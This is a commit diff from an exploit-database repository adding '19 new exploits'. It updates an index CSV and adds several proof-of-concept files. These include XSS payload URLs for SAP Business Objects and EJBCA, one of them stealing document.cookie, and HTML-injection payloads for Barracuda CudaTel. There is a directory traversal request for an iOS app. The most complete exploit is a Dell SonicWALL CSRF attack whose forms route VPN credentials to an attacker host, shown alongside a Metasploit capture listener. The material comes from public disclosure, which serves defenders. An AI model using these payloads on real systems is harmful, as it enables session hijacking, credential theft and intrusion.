DB: 2015-05-08
19 new exploits
This commit is contained in:
parent
b2d25f8fa5
commit
01ba689949
27 changed files with 1185 additions and 21 deletions
32
files.csv
32
files.csv
|
@ -12648,7 +12648,7 @@ id,file,description,date,author,platform,type,port
|
|||
14399,platforms/windows/remote/14399.py,"Easy FTP Server 1.7.0.11 - MKD Command Remote Buffer Overflow Exploit (Post Auth)",2010-07-17,"Karn Ganeshen",windows,remote,0
|
||||
14400,platforms/windows/remote/14400.py,"Easy FTP Server 1.7.0.11 - LIST Command Remote Buffer Overflow Exploit (Post Auth)",2010-07-17,"Karn Ganeshen",windows,remote,0
|
||||
14401,platforms/asp/webapps/14401.txt,"ClickAndRank Script - Authentication Bypass",2010-07-18,walid,asp,webapps,0
|
||||
14402,platforms/windows/remote/14402.py,"Easy FTP Server 1.7.0.11 - CWD Command Remote Buffer Overflow Exploit (Post Auth)",2010-07-18,fdisk,windows,remote,0
|
||||
14402,platforms/windows/remote/14402.py,"Easy FTP Server 1.7.0.11 - CWD Command Remote Buffer Overflow Exploit (Post Auth)",2010-07-18,fdiskyou,windows,remote,0
|
||||
14403,platforms/windows/local/14403.txt,"Microsoft Windows Automatic LNK Shortcut File Code Execution",2010-07-18,Ivanlef0u,windows,local,0
|
||||
14406,platforms/bsd/local/14406.pl,"GhostScript PostScript File Stack Overflow Exploit",2010-07-18,"Rodrigo Rubira Branco",bsd,local,0
|
||||
14407,platforms/aix/remote/14407.c,"rpc.pcnfsd Remote Format String Exploit",2010-07-18,"Rodrigo Rubira Branco",aix,remote,0
|
||||
|
@ -12718,7 +12718,7 @@ id,file,description,date,author,platform,type,port
|
|||
14485,platforms/php/webapps/14485.txt,"nuBuilder 10.04.20 - Local File Inclusion Vulnerability",2010-07-27,"John Leitch",php,webapps,0
|
||||
14491,platforms/windows/local/14491.txt,"Zemana AntiLogger AntiLog32.sys <= 1.5.2.755 - Local Privilege Escalation Vulnerability",2010-07-28,th_decoder,windows,local,0
|
||||
14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - HTTP Remote Buffer Overflow (Post Auth)",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0
|
||||
14497,platforms/windows/local/14497.py,"WM Downloader 3.1.2.2 2010.04.15 - Buffer Overflow (SEH)",2010-07-28,fdisk,windows,local,0
|
||||
14497,platforms/windows/local/14497.py,"WM Downloader 3.1.2.2 2010.04.15 - Buffer Overflow (SEH)",2010-07-28,fdiskyou,windows,local,0
|
||||
14488,platforms/php/webapps/14488.txt,"joomla component appointinator 1.0.1 - Multiple Vulnerabilities",2010-07-27,"Salvatore Fresta",php,webapps,0
|
||||
14489,platforms/unix/remote/14489.c,"Apache Tomcat < 6.0.18 utf8 - Directory Traversal Vulnerability",2010-07-28,mywisdom,unix,remote,0
|
||||
14490,platforms/php/webapps/14490.txt,"nuBuilder Remote File inclusion Vulnerability",2010-07-28,Ahlspiess,php,webapps,0
|
||||
|
@ -12813,7 +12813,7 @@ id,file,description,date,author,platform,type,port
|
|||
14617,platforms/jsp/webapps/14617.txt,"Apache JackRabbit 2.0.0 webapp XPath Injection",2010-08-11,"ADEO Security",jsp,webapps,0
|
||||
14620,platforms/windows/dos/14620.py,"RightMark Audio Analyzer 6.2.3 - Denial of Service Vulnerability",2010-08-11,"Oh Yaw Theng",windows,dos,0
|
||||
14621,platforms/windows/dos/14621.py,"Abac Karaoke 2.15 - Denial of Service Vulnerability",2010-08-11,"Oh Yaw Theng",windows,dos,0
|
||||
14622,platforms/php/webapps/14622.txt,"KnowledgeTree 3.5.2 Community Edition Permanent XSS Vulnerability",2010-08-11,fdisk,php,webapps,0
|
||||
14622,platforms/php/webapps/14622.txt,"KnowledgeTree 3.5.2 Community Edition Permanent XSS Vulnerability",2010-08-11,fdiskyou,php,webapps,0
|
||||
14623,platforms/windows/remote/14623.py,"Easy FTP Server 1.7.0.11 - Multiple Commands Remote Buffer Overflow Exploit (Post Auth)",2010-08-11,"Glafkos Charalambous ",windows,remote,21
|
||||
14624,platforms/windows/dos/14624.py,"JaMP Player 4.2.2.0 - Denial of Service Vulnerability",2010-08-12,"Oh Yaw Theng",windows,dos,0
|
||||
14625,platforms/windows/dos/14625.py,"CombiWave Lite 4.0.1.4 - Denial of Service Vulnerability",2010-08-12,"Oh Yaw Theng",windows,dos,0
|
||||
|
@ -12833,7 +12833,7 @@ id,file,description,date,author,platform,type,port
|
|||
14643,platforms/php/webapps/14643.txt,"sFileManager <= 24a - Local File Inclusion Vulnerability",2010-08-14,Pepelux,php,webapps,0
|
||||
14644,platforms/php/webapps/14644.html,"Saurus CMS Admin Panel - Multiple CSRF Vulnerabilities",2010-08-14,"Fady Mohammed Osman",php,webapps,0
|
||||
14645,platforms/php/webapps/14645.txt,"Sports Accelerator Suite 2.0 - (news_id) Remote SQL Injection Vulnerability",2010-08-14,LiquidWorm,php,webapps,0
|
||||
14646,platforms/windows/dos/14646.py,"CA Advantage Ingres 2.6 - Multiple Buffer Overflow Vulnerabilities PoC",2010-08-14,fdisk,windows,dos,0
|
||||
14646,platforms/windows/dos/14646.py,"CA Advantage Ingres 2.6 - Multiple Buffer Overflow Vulnerabilities PoC",2010-08-14,fdiskyou,windows,dos,0
|
||||
14647,platforms/php/webapps/14647.php,"PHP-Fusion Local File Inclusion Vulnerability",2010-08-15,MoDaMeR,php,webapps,0
|
||||
14648,platforms/php/webapps/14648.txt,"GuestBook Script PHP (XSS/HTML Injection) Multiple Vulnerabilities",2010-08-15,"AnTi SeCuRe",php,webapps,0
|
||||
14651,platforms/windows/local/14651.py,"Rosoft media player 4.4.4 SEH Buffer Overflow",2010-08-15,dijital1,windows,local,0
|
||||
|
@ -13819,7 +13819,7 @@ id,file,description,date,author,platform,type,port
|
|||
15938,platforms/php/webapps/15938.txt,"axdcms-0.1.1 - Local File Include Vulnerbility",2011-01-08,n0n0x,php,webapps,0
|
||||
15939,platforms/php/webapps/15939.txt,"Elxis CMS 2009.2 - Remote file include vulnerbility",2011-01-08,n0n0x,php,webapps,0
|
||||
15940,platforms/windows/dos/15940.pl,"HP Data Protector Manager 6.11 - Remote DoS in RDS Service",2011-01-08,Pepelux,windows,dos,0
|
||||
15941,platforms/windows/local/15941.py,"Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit (SEH)",2011-01-08,fdisk,windows,local,0
|
||||
15941,platforms/windows/local/15941.py,"Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit (SEH)",2011-01-08,fdiskyou,windows,local,0
|
||||
15942,platforms/php/webapps/15942.txt,"sahana agasti <= 0.6.5 - Multiple Vulnerabilities",2011-01-08,dun,php,webapps,0
|
||||
15943,platforms/php/webapps/15943.txt,"mingle forum (wordpress plugin) <= 1.0.26 - Multiple Vulnerabilities",2011-01-08,"Charles Hooper",php,webapps,0
|
||||
15944,platforms/linux/local/15944.c,"Linux Kernel < 2.6.34 - CAP_SYS_ADMIN x86 & x64 - Local Privilege Escalation Exploit (2)",2011-01-08,"Joe Sylve",linux,local,0
|
||||
|
@ -15070,9 +15070,9 @@ id,file,description,date,author,platform,type,port
|
|||
17330,platforms/php/webapps/17330.html,"cPanel < 11.25 - CSRF - Add User php Script",2011-05-27,ninjashell,php,webapps,0
|
||||
17335,platforms/php/webapps/17335.txt,"Duhok Forum 1.1 - SQL Injection Vulnerability",2011-05-28,M.Jock3R,php,webapps,0
|
||||
17336,platforms/php/webapps/17336.txt,"Guru Penny Auction Pro 3.0 - Blind SQL Injection Vulnerability",2011-05-28,v3n0m,php,webapps,0
|
||||
17345,platforms/windows/remote/17345.py,"HP Data Protector Client EXEC_SETUP Remote Code Execution PoC (ZDI-11-056)",2011-05-29,fdisk,windows,remote,0
|
||||
17345,platforms/windows/remote/17345.py,"HP Data Protector Client EXEC_SETUP Remote Code Execution PoC (ZDI-11-056)",2011-05-29,fdiskyou,windows,remote,0
|
||||
17338,platforms/php/webapps/17338.txt,"Joomla Component com_jmsfileseller Local File Inclusion Vulnerability",2011-05-28,Valentin,php,webapps,0
|
||||
17339,platforms/windows/remote/17339.py,"HP Data Protector Client EXEC_CMD Remote Code Execution PoC (ZDI-11-055)",2011-05-28,fdisk,windows,remote,0
|
||||
17339,platforms/windows/remote/17339.py,"HP Data Protector Client EXEC_CMD Remote Code Execution PoC (ZDI-11-055)",2011-05-28,fdiskyou,windows,remote,0
|
||||
17341,platforms/php/webapps/17341.txt,"Joomla Component com_joomnik SQL Injection Vulnerability",2011-05-29,SOLVER,php,webapps,0
|
||||
17343,platforms/php/webapps/17343.txt,"Puzzle Apps CMS 3.2 - Local File Inclusion",2011-05-29,"Treasure Priyamal",php,webapps,0
|
||||
17344,platforms/php/webapps/17344.txt,"Invisionix Roaming System Remote metasys 0.2 - LFI Vulnerability",2011-05-29,"Treasure Priyamal",php,webapps,0
|
||||
|
@ -33311,3 +33311,21 @@ id,file,description,date,author,platform,type,port
|
|||
36906,platforms/linux/dos/36906.txt,"Apache Xerces-C XML Parser < 3.1.2 - DoS POC",2015-05-04,beford,linux,dos,0
|
||||
36907,platforms/php/webapps/36907.txt,"Wordpress Ultimate Product Catalogue 3.1.2 - Multiple Persistent XSS & CSRF & File Upload",2015-05-04,"Felipe Molina",php,webapps,0
|
||||
36908,platforms/lin_x86/shellcode/36908.c,"linux/x86 - exit(0) (6 bytes)",2015-05-04,"Febriyanto Nugroho",lin_x86,shellcode,0
|
||||
36926,platforms/php/webapps/36926.txt,"LeKommerce 'id' Parameter SQL Injection Vulnerability",2012-03-08,Mazt0r,php,webapps,0
|
||||
36927,platforms/php/webapps/36927.txt,"ToendaCMS 1.6.2 setup/index.php site Parameter Traversal Local File Inclusion",2012-03-08,AkaStep,php,webapps,0
|
||||
36928,platforms/windows/local/36928.py,"Macro Toolworks 7.5 Local Buffer Overflow Vulnerability",2012-03-08,"Julien Ahrens",windows,local,0
|
||||
36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0
|
||||
36930,platforms/multiple/webapps/36930.txt,"Wordpress Freshmail Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0
|
||||
36931,platforms/hardware/remote/36931.txt,"Barracuda CudaTel Communication Server 2.0.029.1 Multiple HTML Injection Vulnerabilities",2012-03-08,"Benjamin Kunz Mejri",hardware,remote,0
|
||||
36932,platforms/windows/remote/36932.py,"RealVNC 4.1.0 and 4.1.1 Authentication Bypass Exploit",2012-05-13,fdiskyou,windows,remote,5900
|
||||
36933,platforms/linux/remote/36933.py,"ShellShock dhclient Bash Environment Variable Command Injection PoC",2014-09-29,fdiskyou,linux,remote,0
|
||||
36934,platforms/asp/webapps/36934.txt,"SAP Business Objects InfoVew System listing.aspx searchText Parameter XSS",2012-03-08,vulns@dionach.com,asp,webapps,0
|
||||
36935,platforms/asp/webapps/36935.txt,"SAP Business Objects InfoView System /help/helpredir.aspx guide Parameter XSS",2012-03-08,vulns@dionach.com,asp,webapps,0
|
||||
36936,platforms/asp/webapps/36936.txt,"SAP Business Objects InfoView System /webi/webi_modify.aspx id Parameter XSS",2012-03-08,vulns@dionach.com,asp,webapps,0
|
||||
36937,platforms/php/webapps/36937.html,"phpMyVisites 2.4 phpmv2/index.php Multiple Cross Site Scripting Vulnerabilities",2012-03-09,AkaStep,php,webapps,0
|
||||
36938,platforms/php/webapps/36938.txt,"singapore 0.10.1 'gallery' Parameter Cross Site Scripting Vulnerability",2012-03-11,T0xic,php,webapps,0
|
||||
36939,platforms/java/webapps/36939.txt,"EJBCA 4.0.7 'issuer' Parameter Cross Site Scripting Vulnerability",2012-03-11,MustLive,java,webapps,0
|
||||
36940,platforms/cgi/webapps/36940.txt,"Dell SonicWALL Secure Remote Access (SRA) Appliance Cross-Site Request Forgery",2015-05-07,"Veit Hailperin",cgi,webapps,443
|
||||
36941,platforms/xml/webapps/36941.txt,"IBM WebSphere Portal Stored Cross-Site Scripting Vulnerability",2015-05-07,"Filippo Roncari",xml,webapps,0
|
||||
36942,platforms/php/webapps/36942.txt,"WordPress Freshmail Plugin <= 1.5.8 - (shortcode.php) SQL Injection",2015-05-07,"Felipe Molina",php,webapps,80
|
||||
36943,platforms/ios/webapps/36943.txt,"Album Streamer 2.0 iOS - Directory Traversal Vulnerability",2015-05-07,Vulnerability-Lab,ios,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
10
platforms/asp/webapps/36934.txt
Executable file
10
platforms/asp/webapps/36934.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/52361/info
|
||||
|
||||
SAP Business Objects is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
SAP Business Objects XI R2 is vulnerable; other versions may be affected.
|
||||
|
||||
http://www.example.com/businessobjects/enterprise115/InfoView/listing.aspx
|
||||
searchText=</script><script>alert(1);</script>
|
9
platforms/asp/webapps/36935.txt
Executable file
9
platforms/asp/webapps/36935.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/52361/info
|
||||
|
||||
SAP Business Objects is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
SAP Business Objects XI R2 is vulnerable; other versions may be affected.
|
||||
|
||||
https://www.example.com/businessobjects/enterprise115/infoview/help/helpredir.aspx?guide='+alert('XSS 1')+'&lang=en&rpcontext='+alert('XSS 2')+'#
|
9
platforms/asp/webapps/36936.txt
Executable file
9
platforms/asp/webapps/36936.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/52361/info
|
||||
|
||||
SAP Business Objects is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
SAP Business Objects XI R2 is vulnerable; other versions may be affected.
|
||||
|
||||
https://www.example.com/businessobjects/enterprise115/infoview/webi/webi_modify.aspx?id='+alert('XSS')+'#
|
64
platforms/cgi/webapps/36940.txt
Executable file
64
platforms/cgi/webapps/36940.txt
Executable file
|
@ -0,0 +1,64 @@
|
|||
# Exploit Title: Dell SonicWALL Secure Remote Access (SRA) Appliance Cross-Site Request Forgery
|
||||
# Date: 04/28/2015
|
||||
# Exploit Author: Veit Hailperin
|
||||
# Vendor Homepage: www.dell.com
|
||||
# Version: Dell SonicWALL SRA 7.5 prior to 7.5.1.0-38sv and 8.0 prior to 8.0.0.1-16sv
|
||||
# CVE : 2015-2248
|
||||
|
||||
Exploitation Procedure (Outline):
|
||||
1. Use CSRF to force currently logged in user to create a bookmark pointing to an endpoint controlled by the attacker.
|
||||
2. Use subsequent request to call the bookmark just created. The identifier of the bookmark can be bruteforced using a single decrementing integer and causes minimal time delay.
|
||||
3. Gather the credentials on the target server provided in step #1
|
||||
|
||||
1. Create a bookmark:
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<form action="https://vulnerable.vpn-installation.tld/cgi-bin/editBookmark" method="POST">
|
||||
<input type="hidden" name="bmName" value="foo" />
|
||||
<input type="hidden" name="host" value="www.malicious-host.tld" />
|
||||
<input type="hidden" name="description" value="bar" />
|
||||
<input type="hidden" name="tabs" value="Baz" />
|
||||
<input type="hidden" name="service" value="HTTP" />
|
||||
<input type="hidden" name="fbaSSOEnabled" value="on" />
|
||||
<input type="hidden" name="fbaSSOFormUserName" value="user" />
|
||||
<input type="hidden" name="fbaSSOFormUserPassword" value="password" />
|
||||
<input type="hidden" name="MC_App" value="inherit" />
|
||||
<input type="hidden" name="MC_Copy" value="inherit" />
|
||||
<input type="hidden" name="MC_Print" value="inherit" />
|
||||
<input type="hidden" name="MC_Offline" value="inherit" />
|
||||
<input type="hidden" name="name" value="name" />
|
||||
<input type="hidden" name="type" value="type" />
|
||||
<input type="hidden" name="owner" value="owner" />
|
||||
<input type="hidden" name="cmd" value="add" />
|
||||
<input type="hidden" name="wantBmData" value="true" />
|
||||
<input type="hidden" name="ok" value="OK" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
2. Call the newly created bookmark
|
||||
This might require some guesswork, because we don't know which value bookmarkAccessed needs to have.
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<form action="https://vulnerable.vpn-installation.tld/cgi-bin/http">
|
||||
<input type="hidden" name="HOST" value="www.malicious-host.tld" />
|
||||
<input type="hidden" name="bookmarkAccessed" value="4" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
3. Set up a listener
|
||||
E.g. metasploit payload
|
||||
use auxiliary/server/capture/http_basic
|
||||
|
||||
msf auxiliary(http_basic) >
|
||||
[*] Listening on 0.0.0.0:80...
|
||||
[*] Using URL: http://0.0.0.0:80/
|
||||
[*] Local IP: http://www.malicious-host.tld:80/
|
||||
[*] Server started.
|
||||
[*] vulnerable.vpn-installation.tld http_basic - Sending 401 to client vulnerable.vpn-installation.tld
|
||||
[+] vulnerable.vpn-installation.tld http_basic - vulnerable.vpn-installation.tld - Credential collected: "user:password"
|
27
platforms/hardware/remote/36931.txt
Executable file
27
platforms/hardware/remote/36931.txt
Executable file
|
@ -0,0 +1,27 @@
|
|||
source: http://www.securityfocus.com/bid/52358/info
|
||||
|
||||
Barracuda CudaTel Communication Server is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible.
|
||||
|
||||
Barracuda CudaTel Communication Server 2.0.029.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
<td class="detailTD">
|
||||
<div style="float: left;" class="printedName">
|
||||
"><iframe div="" <="" onload='alert("VL")' src="a">
|
||||
</td><script type="text/javascript">extensions_register('extOp530748', 'extOp530748-ext144',
|
||||
{"flag_super":"0","flag_locked":
|
||||
"0","bbx_extension_rcd":"2012-02-16
|
||||
11:21:48.105901","bbx_extension_block_begin":"2088","map"{"bbx_conference_id":null,"bbx_provider_gateway_id":null,"sort_name":
|
||||
"\"><iframe src=a onload=alert(\"vl\")
|
||||
<","bbx_valet_parking_id":null,"bbx_extension_entity_map_id":"82","bbx_extension_entity_
|
||||
map_fallback_exten":null,"bbx_
|
||||
extension_entity_map_metadata":null,"bbx_user_id":null,"bbx_router_id":"20","bbx_group_id":null,"bbx_callflow_id":null,"_force_
|
||||
row_refresh":"0","show_name":"\"><[EXECUTION OF PERSISTENT SCRIPT CODE]
|
||||
<","bbx_queue_id":null,"bbx_tdm_card_port_id":null,"flag_standalone":"1","bbx_auto_attendant_id":null,"bbx_extension_id_
|
||||
forward":null},"bbx_extension_name":null,"bbx_domain_id":"6","bbx_extension_block_end":"2088","type_id":
|
||||
|
||||
{"id":"20","type":"router","col":"bbx_router_id"},"map_id":"82","flag_external":"0","flag_voicemail":"0","bbx_extension_value"
|
||||
:"2088","ldap":0,"bbx_extension_rpd":"2012-02-16 11:21:49.06783","user_synced":null,"printed_name":"\"><[EXECUTION OF
|
||||
PERSISTENT SCRIPT CODE]
|
||||
<","bbx_extension_id":"144","group_synced":null,"type":"router","flag_auto_provision":"0"});</script>
|
204
platforms/ios/webapps/36943.txt
Executable file
204
platforms/ios/webapps/36943.txt
Executable file
|
@ -0,0 +1,204 @@
|
|||
Document Title:
|
||||
===============
|
||||
Album Streamer v2.0 iOS - Directory Traversal Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
http://www.vulnerability-lab.com/get_content.php?id=1481
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2015-05-07
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
1481
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
6.6
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
1 Tap - Quick, Album Streamer, best Photo/Video Transfer app ever! Quick way to share your Album Photos and
|
||||
Videos to your computer. It takes only single tap to stream and download all/selected photos or videos.
|
||||
You can even view or play slide show of all your photos directly on the computer without downloading.
|
||||
|
||||
(Copy of the Homepage: https://itunes.apple.com/DE/app/id835284235 )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The Vulnerability Laboratory Research Team discovered a directory traversal web vulnerability in the official Album Streamer v2.0 iOS mobile web-application.
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2015-05-07: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
Spider Talk
|
||||
Product: Album Streamer - iOS Mobile Web Application (Wifi) 2.0
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
High
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A Path Traveral web vulnerability has been discovered in the official Album Streamer v2.0 iOS mobile web-application.
|
||||
The security vulnerability allows a remote attacker to unauthorized request system path variables to compromise the
|
||||
mobile application or apple iOS device.
|
||||
|
||||
The vulnerability is located in the `id` request to the `path` value of the photoDownload module. The vulnerability can be exploited by
|
||||
local or remote attackers without user interaction. The attacker needs to replace the picture assets id path request of the photoDownload
|
||||
module with a malicious payload like ./etc/passwd ./etc/hosts. The attack vector is located on the application-side of the service and
|
||||
the request method to execute is GET (client-side).
|
||||
|
||||
The security risk of the path traversal web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.6.
|
||||
Exploitation of the directory traversal web vulnerability requires no privileged application user account or user interaction.
|
||||
Successful exploitation of the vulnerability results in mobile application compromise
|
||||
|
||||
Request Method(s):
|
||||
[+] GET
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] photoDownload
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] id
|
||||
|
||||
Affected Module(s):
|
||||
[+] photoDownload Item Index
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
|
||||
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
PoC: http://localhost/photoDownload?id=[DIRECTORY TRAVERSAL]../../../../../../../etc
|
||||
|
||||
|
||||
Vulnerable Source(s): localhost/photoDownload
|
||||
<div class="thumbnailBorder"><div class="thumbnailPicture"><img class="showPreviewModalPopup" src="/photoTbDownload?id=id0" border="0" height="100px" width="100px"></div><div id="thumbnailTitle"><input id="id0" name="photoCheckbox" type="checkbox"> <a href="/photoDownload?id=id0">asset.JPG</a></div></div><div class="thumbnailBorder"><div class="thumbnailPicture"><img class="showPreviewModalPopup" src="/photoTbDownload?id=id1" border="0" height="100px" width="100px"></div><div id="thumbnailTitle"><input id="id1" name="photoCheckbox" type="checkbox"> <a href="/photoDownload?id=id1">asset.PNG</a></div></div>
|
||||
|
||||
<!-- PREVIEW SECTION -->
|
||||
<div style="display: none;" id="overlay"></div>
|
||||
|
||||
<div style="display: none;" id="popupBox">
|
||||
<div style="display: none;" id="popupContent">
|
||||
<img class="previewLoadingImage" id="previewLoading" src="/loading.gif">
|
||||
|
||||
<img class="previewImage" src="/photoDownload?id=id1">
|
||||
|
||||
<img src="/imgAlbumStreamPrev.png" class="btnShowPrev" height="25px" width="25px">
|
||||
|
||||
<img src="/imgAlbumStreamNext.png" class="btnShowNext" height="25px" width="25px">
|
||||
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- BREAK -->
|
||||
<div class="sectionBreak"> </div>
|
||||
|
||||
<!-- VIDEOS SECTION -->
|
||||
<div>
|
||||
<h1>
|
||||
<input class="videoAllCheckBox" id="videoAllCheckBox" type="checkbox"> Videos
|
||||
<input class="btnVideoDownload" value="Download (Selected)" type="button">
|
||||
</h1>
|
||||
</div>
|
||||
|
||||
--- Poc Session Logs [GET] ---
|
||||
Status: 200[OK]
|
||||
GET http://localhost/photoDownload?id=../../../../etc Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[25568] Mime Type[application/x-unknown-content-type]
|
||||
Request Header:
|
||||
Host[localhost]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
Connection[keep-alive]
|
||||
Response Header:
|
||||
Accept-Ranges[bytes]
|
||||
Content-Length[25568]
|
||||
Content-Disposition[: attachment; filename=asset.JPG]
|
||||
Date[Thu, 30 Apr 2015 13:29:14 GMT]
|
||||
|
||||
|
||||
|
||||
Reference(s):
|
||||
http://localhost/
|
||||
http://localhost/photoDownload
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
The vulnerability can be patched by a secure parse of the id value in the photoDownload module.
|
||||
Restrict the input and disallow special chars to prevent further path traversal attacks.
|
||||
implement a whitelist to request only authroized urls through the mobile app api.
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The security risk of the directory traversal vulnerability in the wifi interface is estimated as high. (CVSS 6.6)
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
|
||||
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
|
||||
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
|
||||
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
|
||||
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
|
||||
policies, deface websites, hack into databases or trade with fraud/stolen material.
|
||||
|
||||
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
||||
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
|
||||
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
|
||||
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
|
||||
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
|
||||
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
|
||||
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
|
||||
|
||||
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY - RESEARCH TEAM
|
||||
SERVICE: www.vulnerability-lab.com
|
||||
CONTACT: research@vulnerability-lab.com
|
||||
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
|
||||
|
||||
|
9
platforms/java/webapps/36939.txt
Executable file
9
platforms/java/webapps/36939.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/52400/info
|
||||
|
||||
EJBCA is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
EJBCA 4.0.7 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/ejbca/publicweb/webdist/certdist?cmd=revoked&issuer=%3Cscript%3Ealert(document.cookie)%3C/script%3E&serno=1
|
70
platforms/jsp/webapps/36929.txt
Executable file
70
platforms/jsp/webapps/36929.txt
Executable file
|
@ -0,0 +1,70 @@
|
|||
source: http://www.securityfocus.com/bid/52356/info
|
||||
|
||||
Ilient SysAid is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker could leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
